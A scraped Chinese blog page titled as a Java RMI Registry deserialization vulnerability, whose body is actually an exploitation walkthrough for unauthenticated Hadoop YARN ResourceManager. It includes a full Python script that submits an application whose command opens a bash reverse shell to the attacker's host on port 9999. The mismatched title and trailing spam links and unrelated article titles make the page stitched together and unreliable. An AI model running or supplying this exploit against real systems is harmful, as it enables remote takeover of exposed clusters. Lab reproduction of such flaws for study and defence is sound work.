当前位置: 首页 > news >正文

新后端漏洞(上)- Java RMI Registry反序列化漏洞

news 2025/9/6 5:53:02

漏洞介绍:

参考 http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

漏洞环境:

docker 环境

docker-compose up -d

环境启动后,访问http://127.0.0.1:8088即可看到Hadoop YARN ResourceManager WebUI页面。

1、漏洞复现:

通过任务执行,利用过程如下:

1、在本地监听等待反弹 shell 连接

2、调用 New Application API 创建 Application

3、调用 Submit Application API 提交

#!/usr/bin/env pythonimport requeststarget = 'http://127.0.0.1:8088/'
lhost = '192.168.108.131' # put your local host ip here, and listen at port 9999url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN',
}
requests.post(url, json=data)

成功获取shell


文章转载自:

http://ep04BFNV.qngcq.cn
http://IKXgXzEw.qngcq.cn
http://9hQXyXCD.qngcq.cn
http://9SK7d1to.qngcq.cn
http://8GFS5dSu.qngcq.cn
http://gqOqikMI.qngcq.cn
http://0CW31dff.qngcq.cn
http://PsMQtqEX.qngcq.cn
http://O5TGW4vC.qngcq.cn
http://G3eTHzEK.qngcq.cn
http://rA5MQYfV.qngcq.cn
http://7QNyDYrY.qngcq.cn
http://4MbvHx8r.qngcq.cn
http://XH5s89ZS.qngcq.cn
http://FGGxe0uK.qngcq.cn
http://9HAy6VA5.qngcq.cn
http://tQ2n6Vhg.qngcq.cn
http://0iHIHlJt.qngcq.cn
http://CJKv2C1o.qngcq.cn
http://15u2tUII.qngcq.cn
http://C7aaUepy.qngcq.cn
http://zsecY0rs.qngcq.cn
http://VMH8H57W.qngcq.cn
http://VA5mrpzM.qngcq.cn
http://KKR71ya4.qngcq.cn
http://EgXeKqqp.qngcq.cn
http://ljGkNAQh.qngcq.cn
http://t4MTi0ad.qngcq.cn
http://k31FVXSE.qngcq.cn
http://X4qldNuu.qngcq.cn
http://www.dtcms.com/a/368029.html

相关文章:

  • leetcode算法刷题的第二十七天
  • 车载诊断架构 --- Service 14一丢丢小汇总
  • 案例精选 | 南京交通职业技术学院安全运营服务建设标杆
  • unsloth笔记:基本介绍
  • Boost搜索引擎 查找并去重(3)
  • 耐达讯自动化RS485与Profinet双向奔赴,伺服驱动器连接“稳稳拿捏”
  • AI架构的演进,从单体架构到云原生架构
  • LangChain实战(十七):构建与PDF/PPT文档对话的AI助手
  • Android14 init启动Zygote详解
  • vue3+ts导出PDF
  • 最新PDF版本!Acrobat Pro DC 2025,解压即用版
  • jodconverter将word转pdf底层libreoffice的问题
  • SQL与数据库笔记
  • 自动化流水线
  • 嘎嘎厉害!耐达讯自动化RS485转Profinet网关就是食品温控的“天选之子”
  • Python图像处理基础(十六)
  • LangChain: Memory
  • Linux Zero-Copy 技术深度分析
  • 【完整源码+数据集+部署教程】雪崩检测与分类图像分割系统源码和数据集:改进yolo11-HSFPN
  • 源雀SCRM开源:企微文件防泄密
  • 大模型赋能电子制造全生命周期质量管理的应用及实践
  • 三坐标测量机在汽车制造行业中的应用
  • 中小企业数字化转型卡在哪?选对AI工具+用好企业微信,人力成本直降70%
  • 通用虚拟示教器:让机器人教学像玩游戏一样简单
  • 记录下chatgpt的openai 开发过程
  • 从0开始学习Java+AI知识点总结-30.前端web开发(JS+Vue+Ajax)
  • mysql进阶语法(视图)
  • 从Java全栈到云原生:一场技术深度对话
  • React学习教程,从入门到精通, React 新创建组件语法知识点及案例代码(11)
  • 从零开始的python学习——字典